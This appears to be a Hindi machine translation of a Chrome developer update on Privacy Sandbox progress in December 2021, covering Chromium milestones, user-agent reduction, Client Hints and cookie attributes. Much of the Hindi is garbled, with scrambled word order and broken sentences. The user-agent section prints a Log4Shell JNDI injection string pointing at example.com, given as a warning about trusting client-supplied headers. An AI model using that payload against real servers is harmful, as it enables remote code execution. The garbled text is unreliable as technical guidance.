प्राइवसी सैंडबॉक्स में अब तक की प्रोग्रेस (दिसंबर 2021)

साल 2021 में, 'निजता' में प्रोग्रेस के रैप-अप वर्शन में आपका स्वागत है सैंडबॉक्स, का पाथ है, ताकि Chrome में तीसरे पक्ष की कुकी के इस्तेमाल को बंद किया जा सके और अन्य कुकी को निजी वेब. आम तौर पर, हम Privacy Sandbox के अपडेट की खास जानकारी शेयर करते हैं टाइमलाइन के साथ-साथ दुनिया भर की खबरों की जानकारी दिसंबर का महीना बहुत शांत था. इसके बजाय, हम इनमें से कुछ साल 2021 में की गई गतिविधियों का डेटा इकट्ठा किया है और कुछ संभावित समाधान दिए हैं आ रहे हैं नए साल में.

Chromium को डेवलप करने की प्रोसेस

वेब प्लैटफ़ॉर्म की नई सुविधा को Chromium पर इस्तेमाल करने के लिए, इसे प्रोजेक्ट का ओपन डेवलपमेंट प्रोसेस. साल 2021 में, प्राइवसी सैंडबॉक्स की टीम ने ये प्रॉडक्ट बनाए:

🥚प्रोटोटाइप बनाने की कोशिश 19
🧪प्रयोग करने की इच्छा7
🚀शिप करने की इच्छा 11
सोर्स

हर माइलस्टोन हासिल करने पर, बड़े वेब नेटवर्क को भी योगदान देने का न्योता मिलता है.

प्रोटोटाइप का इंटेंट पहला चेकपॉइंट है, जहां हम चर्चा के लिए न्योता देते हैं और शुरुआती दौर में प्रयोग करना होगा. इसका मतलब है कि एक प्रस्ताव, GitHub पर उपलब्ध होगा. जहां समस्या बनाकर सवाल पूछा जा सकता है या बातचीत में शामिल हुआ जा सकता है और स्टैंडर्ड में प्रज़ेंटेशन ग्रुप, जैसे कि W3C और आईईटीएफ़. यहां से कोडिंग की शुरुआत भी होती है. इसका मतलब है कि आपको यह देखने को मिलेगा के पीछे डेवलपर परीक्षण के लिए उपलब्ध कराई जाने वाली प्रोटोटाइप काम की क्षमता सुविधा फ़्लैग करें. शुरुआती सुझाव, प्रस्तावों की पुष्टि करने और उन्हें फिर से लागू करने के लिए अहम होते हैं.

प्रयोग का इंटेंट एक वैकल्पिक चरण है, अगर हमें ऑरिजिन ट्रायल. डेवलपर शुरुआत की जगह के लिए साइन अप कर सकते हैं ट्रायल को आज़माएं. इसके बाद, प्रोडक्शन में इसकी जांच करें. इसे एक प्रयोग इसलिए कहते हैं क्योंकि हमारे पास उस सुविधा के विशिष्ट पहलू हैं जो हम को असल दुनिया में पुष्टि करनी हो. ऐसे डेवलपर जो यह जांच कर सकते हैं और लोगों को उन टेस्ट के नतीजे शेयर करने चाहिए: उसे बेहतर बनाने के लिए.

शिप करने का इरादा आखिरी माइलस्टोन है. इससे यह पता चलता है कि सुविधा फ़िलहाल उपलब्ध है पूरी जानकारी. साथ ही, सामान्य रूप से उपलब्ध होने के लिए तैयार है. मंज़ूरी मिलने के बाद, यह सुविधा आने वाली रिलीज़ में मर्ज किया जाता है और फिर कैनरी, बीटा वर्शन, और स्टेबल चैनल शामिल हैं. यह पक्का करना ज़रूरी है कि आप अपनी साइट की जांच के लिए कैनरी और Chrome के बीटा वर्शन की मदद से किसी सुविधा के स्थिर होने से पहले ही, गड़बड़ियों की शिकायत कर दें.

प्रस्ताव

प्राइवसी सैंडबॉक्स के हर प्रपोज़ल में, GitHub रिपॉज़िटरी की जानकारी शामिल होती है. ऐप्लिकेशन रिपॉज़िटरी की सुविधा में सभी फ़ंक्शन के बारे में ख़ास जानकारी दी जाती है. ब्राउज़र के अनुसार लागू करने के लिए विशिष्ट जानकारी, और समस्याओं और पुल के अनुरोधों के रूप में वेब नेटवर्क में उपलब्ध है.

प्राइवसी सैंडबॉक्स के 14 डेटा स्टोर करने की जगहों में:

💬545समस्याओं की संख्या
250समस्याएं बंद की गईं
🛠️261पुल के अनुरोध किए गए
223पुल के अनुरोध मर्ज किए गए
सोर्स

जानकारी और खास जानकारी में इस्तेमाल की गई भाषा, अक्सर ऑडियंस को टारगेट करती है जिन्हें पहले से ही मानकों और ब्राउज़र डेवलपमेंट की जानकारी है. अगर आपको इसके बारे में पता न हो, तो यह चुनौती भरा होता है. हालांकि, एक्सप्लेनर का मकसद है कि ज़्यादा जानकारी दो! अगर कुछ ऐसे बिंदु हैं जिन्हें साफ़ तौर पर नहीं बताया गया है या शामिल नहीं किए गए हैं, तो हम चाहते हैं कि आप कोई समस्या दर्ज करें, ताकि हम उसे अपडेट कर सकें और जानकारी को बेहतर तरीके से समझ सकें.

रिज़ॉल्यूशन

उपयोगकर्ता एजेंट के स्प्रिंग सीज़न की सफ़ाई

जैसे-जैसे हम नए साल की गिनती कम कर रहे हैं वैसे-वैसे हम दोनों की गिनती ज़्यादा कर रहे हैं Chrome 100 और लगातार होने वाली की कमी उपयोगकर्ता-एजेंट स्ट्रिंग के तौर पर होती है. यह एक अच्छा है यह जांचने के लिए कि क्या आपके कोड में उपयोगकर्ता-एजेंट स्ट्रिंग के किसी भी इस्तेमाल को फिर से इस्तेमाल करने की प्रेरणा देने वाला उस पर इनमें से किसी भी बदलाव का असर पड़ता है.

उन इलाकों को ढूंढने के लिए:

  1. अपने JavaScript कोड में navigator.userAgent खोजें या आपके सर्वर कोड में User-Agent हेडर.
  2. दो अंकों वाले वर्शन का अनुमान लगाने के लिए, स्ट्रिंग को पार्स करें. इसके लिए जैसे, \d\d या \d{2} को तय करने वाले रेगुलर एक्सप्रेशन को इससे बदला जाना चाहिए \d+.
  3. जहां भी आप इन पर भरोसा करते हैं वहां के लिए अपने स्ट्रिंग के इस्तेमाल की जांच करें:
    • प्लैटफ़ॉर्म (ऑपरेटिंग सिस्टम) वर्शन
    • Chrome का पूरा बिल्ड वर्शन
    • मोबाइल डिवाइस का नाम
  4. ये वही वैल्यू हैं जिन्हें आने वाले समय में, तय स्ट्रिंग में कम कर दिया जाएगा. अगर आपने तो आपको इन वैल्यू का ऐक्सेस चाहिए, User-Agent Client पर माइग्रेट करें हिंट.

अगर यूज़र-एजेंट क्लाइंट का इस्तेमाल किया जा रहा है, तो इस बारे में जानकारी देने के लिए दिसंबर में एक अपडेट है संकेत, हमने दूसरे लोगों को संकेत सौंपना चालू करने के लिए शिप करने का इंटेंट भेजा है ऑरिजिन एचटीएमएल <meta> टैग के ज़रिए पोस्ट किया जा सकता है. उदाहरण के लिए:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

अगर आपको वसंत में सफ़ाई का शौक है, तो के अलावा, उपयोगकर्ता-एजेंट के इस्तेमाल के सभी विकल्प भी शामिल हैं. यदि आप तो मोबाइल डिवाइसेस का पता लगाएं, फिर जांच करें कि क्या आप उनकी जगह रिस्पॉन्सिव डिज़ाइन. अगर सुविधा का इस्तेमाल करने के लिए ब्राउज़र का नाम और वर्शन देखा जा रहा है, तो यह देखें इसके बजाय, फ़ीचर डिटेक्शन का इस्तेमाल किया जा सकता है.

इस बात का हमेशा ध्यान रखें कि उपयोगकर्ता-एजेंट, किसी भी दिए गए क्लाइंट की तरह उसके सही होने की गारंटी नहीं है और न ही वह दी गई होगी. हाल ही का Log4j जोखिम की आशंका, "Log4shell" इस जोखिम का उदाहरण देता है. ऐसा क्लाइंट जो अपनी उपयोगकर्ता-एजेंट स्ट्रिंग को कोई मान शामिल करें जैसे ${jndi:ldap://example.com/file} साइट को पाने में सक्षम हो सकता है को सर्वर पर सक्रिय रूप से पार्स करने के लिए.

नए साल की एक और पारंपरिक गतिविधि यह पक्का करना है कि आप इस बात से खुश रहें कि अच्छी मात्रा में कुकी का इस्तेमाल करना चाहिए. जैसे-जैसे हम आगे बढ़ते रहते हैं इस चरण को तीसरे पक्ष की कुकी का इस्तेमाल बंद करने के लिए, आपको यह पक्का करना होगा कि आपकी साइट की कौनसी कुकी पर असर पड़ेगा. साल 2020 ने शुरुआत में क्रॉस-साइट या तीसरे-पक्ष के लिए सभी कुकी को मार्क करना ज़रूरी हो गया इस्तेमाल करें SameSite=None के साथ.

जिस कुकी में आपने SameSite एट्रिब्यूट को None पर सेट किया है उसे अपडेट.

इस समय ध्यान में रखने के लिए तीन संभावित रास्ते हैं:

  1. अगर कुकी सिर्फ़ टॉप लेवल साइट के साथ 1:1 संबंध में ज़रूरी है, तो फिर सीएचआईपीएस की प्रोग्रेस को फ़ॉलो करें प्रस्ताव. इसका मतलब है कि आपको Partitioned एट्रिब्यूट का इस्तेमाल करके कुकी को जोड़ा जा सकता है.
  2. अगर कुकी का इस्तेमाल क्रॉस-साइट कॉन्टेक्स्ट में किया जाता है, लेकिन सिर्फ़ उन साइटों पर जहां आपने और उसे चलाने का अधिकार है, तो वह पहले पक्ष का उम्मीदवार हो सकता है सेट. इसके लिए सेट में मौजूद साइटों और कुकी में SameParty एट्रिब्यूट जोड़ना.
  3. अगर कुकी का इस्तेमाल एक से ज़्यादा प्रॉपर्टी में किसी तरह का शेयर किया गया मान देने के लिए किया जाता है साइटों और प्राइवसी सैंडबॉक्स के बड़े सेट की जांच करें के लिए प्रस्ताव शामिल किए गए हैं, जो अलग-अलग साइटों की ट्रैकिंग का बेहतर तरीके से इस्तेमाल किया जा सकता है.

अगर आप खास तौर पर सेहत को लेकर बेहतर महसूस कर रहे हैं, तो यह समय भी बिलकुल सही है ताकि कुकी के इस्तेमाल की जानकारी फिर से दी जा सके. ऐसा इसलिए, क्योंकि हमारे पास आपके कुकी के इस्तेमाल को बेहतर बनाने पहले-पक्ष की कुकी का भी इस्तेमाल किया जा सकता है.

सुझाव/राय दें या शिकायत करें

हम हर महीने होने वाले इन अपडेट को पब्लिश करते रहते हैं और प्राइवसी सैंडबॉक्स के पूरे डेटा के लिए, हम यह पक्का करना चाहते हैं कि डेवलपर को उनकी ज़रूरत की जानकारी और सहायता उपलब्ध कराती है. हमें @ChromiumDev पर बताएं Twitter: अगर हम कुछ ऐसा कर सकते हैं हमने इस सीरीज़ में सुधार किया. हम इस फ़ॉर्मैट को बेहतर बनाने के लिए आपकी जानकारी का इस्तेमाल करेंगे.

Privacy Sandbox के बारे में अक्सर पूछे जाने वाले सवाल देखें. डेवलपर सहायता को रेपो के बारे में ज़्यादा जानें. अगर आपको किसी भी प्रस्ताव की टेस्टिंग या उसे लागू करने को लेकर आपका कोई सवाल है, हमसे वहां बात करो.